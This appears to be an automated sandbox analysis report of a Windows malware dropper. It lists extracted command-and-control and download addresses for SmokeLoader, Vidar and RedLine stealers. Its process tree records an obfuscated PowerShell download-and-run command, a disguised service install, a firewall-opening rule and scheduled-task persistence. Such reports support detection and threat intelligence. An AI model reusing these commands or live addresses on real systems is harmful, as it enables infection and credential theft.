Analysis

  • max time kernel
    118s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    11-03-2022 21:47

General

  • Target

    b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe

  • Size

    3.1MB

  • MD5

    f57537f2d3f3b6928530f88eeb71d22f

  • SHA1

    af43ea7dd676fbc6cee400af5052de361ec5a2ae

  • SHA256

    b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24

  • SHA512

    5c31cae8e1138251969483203d6ea96349a35a2ac42597baae2233bb7e39357b637c3f6ee69b4d75d0c3a22df40275bef6cfd0ece45c87ac2e6479f6fc36955e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

Lyla2

C2

bonezarisor.xyz:80

Attributes
  • auth_value

    de2a98abc502b86b809fbc366af9256a

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 16 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 1 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 58 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible privilege escalation attempt 2 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 16 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 32 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 27 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 30 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe
    "C:\Users\Admin\AppData\Local\Temp\b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3100
      • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sotema_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.exe
            sotema_1.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:484
            • C:\Windows\SysWOW64\rUNdlL32.eXe
              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
              6⤵
              • Loads dropped DLL
              PID:3608
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 604
                7⤵
                • Program crash
                PID:3332
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sotema_7.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2880
          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
            sotema_7.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              6⤵
              • Executes dropped EXE
              PID:3572
            • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              6⤵
              • Executes dropped EXE
              PID:1568
            • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              6⤵
              • Executes dropped EXE
              PID:3952
            • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sotema_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_6.exe
            sotema_6.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:1184
            • C:\Users\Admin\Documents\3yMtczVXNtqMP89LIvk7QYbS.exe
              "C:\Users\Admin\Documents\3yMtczVXNtqMP89LIvk7QYbS.exe"
              6⤵
              • Executes dropped EXE
              PID:1204
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1204
                7⤵
                • Program crash
                PID:3992
            • C:\Users\Admin\Documents\aZNvbi1qOlM2iXjLOIdGOTe7.exe
              "C:\Users\Admin\Documents\aZNvbi1qOlM2iXjLOIdGOTe7.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:1344
              • C:\Users\Admin\AppData\Local\Temp\RegSvc.exe
                "C:\Users\Admin\AppData\Local\Temp\RegSvc.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:1572
            • C:\Users\Admin\Documents\RaRBFtrTBYU1Y0tjpmree9bR.exe
              "C:\Users\Admin\Documents\RaRBFtrTBYU1Y0tjpmree9bR.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of AdjustPrivilegeToken
              PID:448
              • C:\Users\Admin\AppData\Local\Temp\2a6bacde-3795-4e9f-bf7b-f95052cca579.exe
                "C:\Users\Admin\AppData\Local\Temp\2a6bacde-3795-4e9f-bf7b-f95052cca579.exe"
                7⤵
                • Executes dropped EXE
                • Checks processor information in registry
                PID:5332
            • C:\Users\Admin\Documents\plrFbDYtIxqeEfatjuv652pe.exe
              "C:\Users\Admin\Documents\plrFbDYtIxqeEfatjuv652pe.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              PID:4100
            • C:\Users\Admin\Documents\ciTtNor6DDyzdbtHN54ouYOI.exe
              "C:\Users\Admin\Documents\ciTtNor6DDyzdbtHN54ouYOI.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              PID:4180
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                7⤵
                  PID:4788
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd
                    8⤵
                      PID:5608
                      • C:\Windows\SysWOW64\find.exe
                        find /I /N "bullguardcore.exe"
                        9⤵
                          PID:5700
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /FI "imagename eq BullGuardCore.exe"
                          9⤵
                          • Enumerates processes with tasklist
                          PID:4376
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /FI "imagename eq PSUAService.exe"
                          9⤵
                          • Enumerates processes with tasklist
                          PID:1888
                        • C:\Windows\SysWOW64\find.exe
                          find /I /N "psuaservice.exe"
                          9⤵
                            PID:4804
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                            9⤵
                              PID:4472
                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                              Accostarmi.exe.pif N
                              9⤵
                                PID:5972
                        • C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe
                          "C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4172
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe
                            7⤵
                              PID:5984
                              • C:\Windows\system32\choice.exe
                                choice /C Y /N /D Y /T 0
                                8⤵
                                  PID:4224
                            • C:\Users\Admin\Documents\RvDZTDbVe8cu7cHeyBtfVhCf.exe
                              "C:\Users\Admin\Documents\RvDZTDbVe8cu7cHeyBtfVhCf.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:4488
                              • C:\Users\Admin\AppData\Local\Temp\55FM6.exe
                                "C:\Users\Admin\AppData\Local\Temp\55FM6.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4988
                              • C:\Users\Admin\AppData\Local\Temp\BJ4F6.exe
                                "C:\Users\Admin\AppData\Local\Temp\BJ4F6.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5532
                              • C:\Users\Admin\AppData\Local\Temp\H9LM9.exe
                                "C:\Users\Admin\AppData\Local\Temp\H9LM9.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5232
                              • C:\Users\Admin\AppData\Local\Temp\F1BG9.exe
                                "C:\Users\Admin\AppData\Local\Temp\F1BG9.exe"
                                7⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Modifies system certificate store
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5872
                              • C:\Users\Admin\AppData\Local\Temp\M7AEC13I8KEH8BD.exe
                                https://iplogger.org/1nChi7
                                7⤵
                                  PID:5420
                                • C:\Users\Admin\AppData\Local\Temp\A23L2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\A23L2.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:4740
                                  • C:\Windows\SysWOW64\regsvr32.exe
                                    "C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
                                    8⤵
                                    • Loads dropped DLL
                                    PID:1804
                              • C:\Users\Admin\Documents\fkozqZVOJK8nYg3uy3BmTTkU.exe
                                "C:\Users\Admin\Documents\fkozqZVOJK8nYg3uy3BmTTkU.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4404
                                • C:\Users\Admin\AppData\Local\Temp\7zSD280.tmp\Install.exe
                                  .\Install.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2456
                              • C:\Users\Admin\Documents\xQJudsUslbRDEyOqmqKmWsYK.exe
                                "C:\Users\Admin\Documents\xQJudsUslbRDEyOqmqKmWsYK.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4392
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 344
                                  7⤵
                                  • Program crash
                                  PID:5264
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 344
                                  7⤵
                                  • Program crash
                                  PID:4928
                              • C:\Users\Admin\Documents\74CIU7hguX3Rep8AcBT0owXq.exe
                                "C:\Users\Admin\Documents\74CIU7hguX3Rep8AcBT0owXq.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4364
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 432
                                  7⤵
                                  • Program crash
                                  PID:4500
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 440
                                  7⤵
                                  • Program crash
                                  PID:6068
                              • C:\Users\Admin\Documents\UBGIMlfT_24VXrYTNn4S0uSp.exe
                                "C:\Users\Admin\Documents\UBGIMlfT_24VXrYTNn4S0uSp.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:4332
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                  7⤵
                                    PID:5640
                                    • C:\Windows\system32\mode.com
                                      mode 65,10
                                      8⤵
                                        PID:5556
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e file.zip -p320791618516055 -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4384
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_9.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2264
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_8.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2512
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_7.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:6012
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_6.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:1632
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_5.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:6096
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_4.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4116
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_3.zip -oextracted
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:444
                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                        7z.exe e extracted/file_2.zip -oextracted
                                        8⤵
                                          PID:1644
                                        • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                          7z.exe e extracted/file_1.zip -oextracted
                                          8⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4984
                                        • C:\Windows\system32\attrib.exe
                                          attrib +H "Result_protected.exe"
                                          8⤵
                                          • Views/modifies file attributes
                                          PID:5124
                                        • C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
                                          "Result_protected.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks computer location settings
                                          • Checks whether UAC is enabled
                                          PID:4600
                                          • C:\Users\Admin\AppData\Local\Temp\build.exe
                                            "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4524
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                              10⤵
                                              • Creates scheduled task(s)
                                              PID:220
                                          • C:\Users\Admin\AppData\Local\Temp\222.exe
                                            "C:\Users\Admin\AppData\Local\Temp\222.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:5296
                                    • C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe
                                      "C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:4308
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 624
                                        7⤵
                                        • Program crash
                                        PID:5240
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 660
                                        7⤵
                                        • Program crash
                                        PID:5328
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 632
                                        7⤵
                                        • Program crash
                                        PID:3900
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 728
                                        7⤵
                                        • Program crash
                                        PID:5724
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 840
                                        7⤵
                                        • Program crash
                                        PID:4452
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1268
                                        7⤵
                                        • Program crash
                                        PID:5636
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1240
                                        7⤵
                                        • Program crash
                                        PID:5648
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "CyPSXzY1M1Ivhbr6JmTc7SY5.exe" /f & erase "C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe" & exit
                                        7⤵
                                          PID:6000
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "CyPSXzY1M1Ivhbr6JmTc7SY5.exe" /f
                                            8⤵
                                            • Kills process with taskkill
                                            PID:6024
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1128
                                          7⤵
                                          • Program crash
                                          PID:5256
                                      • C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe
                                        "C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Adds Run key to start application
                                        PID:4300
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bsxnalar\
                                          7⤵
                                            PID:5556
                                          • C:\Windows\SysWOW64\sc.exe
                                            "C:\Windows\System32\sc.exe" create bsxnalar binPath= "C:\Windows\SysWOW64\bsxnalar\nflmumnc.exe /d\"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe\"" type= own start= auto DisplayName= "wifi support"
                                            7⤵
                                              PID:6084
                                            • C:\Windows\SysWOW64\sc.exe
                                              "C:\Windows\System32\sc.exe" description bsxnalar "wifi internet conection"
                                              7⤵
                                                PID:4032
                                              • C:\Windows\SysWOW64\sc.exe
                                                "C:\Windows\System32\sc.exe" start bsxnalar
                                                7⤵
                                                  PID:1996
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nflmumnc.exe" C:\Windows\SysWOW64\bsxnalar\
                                                  7⤵
                                                    PID:5836
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                    7⤵
                                                      PID:5832
                                                    • C:\Users\Admin\bpqsuzmp.exe
                                                      "C:\Users\Admin\bpqsuzmp.exe" /d"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:2412
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cqrtvanq.exe" C:\Windows\SysWOW64\bsxnalar\
                                                        8⤵
                                                          PID:1504
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" config bsxnalar binPath= "C:\Windows\SysWOW64\bsxnalar\cqrtvanq.exe /d\"C:\Users\Admin\bpqsuzmp.exe\""
                                                          8⤵
                                                            PID:5280
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start bsxnalar
                                                            8⤵
                                                              PID:5956
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                              8⤵
                                                                PID:4224
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4882.bat" "
                                                                8⤵
                                                                  PID:4820
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 1308
                                                                  8⤵
                                                                  • Program crash
                                                                  PID:5816
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 1156
                                                                7⤵
                                                                • Program crash
                                                                PID:5928
                                                            • C:\Users\Admin\Documents\VZ7NTurPKHOFfMK1BrDT_Vg7.exe
                                                              "C:\Users\Admin\Documents\VZ7NTurPKHOFfMK1BrDT_Vg7.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks processor information in registry
                                                              PID:4164
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                7⤵
                                                                • Blocklisted process makes network request
                                                                PID:5212
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1000
                                                                7⤵
                                                                • Program crash
                                                                PID:4432
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1008
                                                                7⤵
                                                                • Program crash
                                                                PID:5692
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1044
                                                                7⤵
                                                                • Program crash
                                                                PID:5836
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1052
                                                                7⤵
                                                                • Program crash
                                                                PID:5484
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1008
                                                                7⤵
                                                                • Program crash
                                                                PID:1892
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1048
                                                                7⤵
                                                                • Program crash
                                                                PID:5792
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1080
                                                                7⤵
                                                                • Program crash
                                                                PID:5160
                                                            • C:\Users\Admin\Documents\IF3sualFSZNKp2Oo3vzXX3_r.exe
                                                              "C:\Users\Admin\Documents\IF3sualFSZNKp2Oo3vzXX3_r.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4156
                                                            • C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe
                                                              "C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4148
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                7⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4836
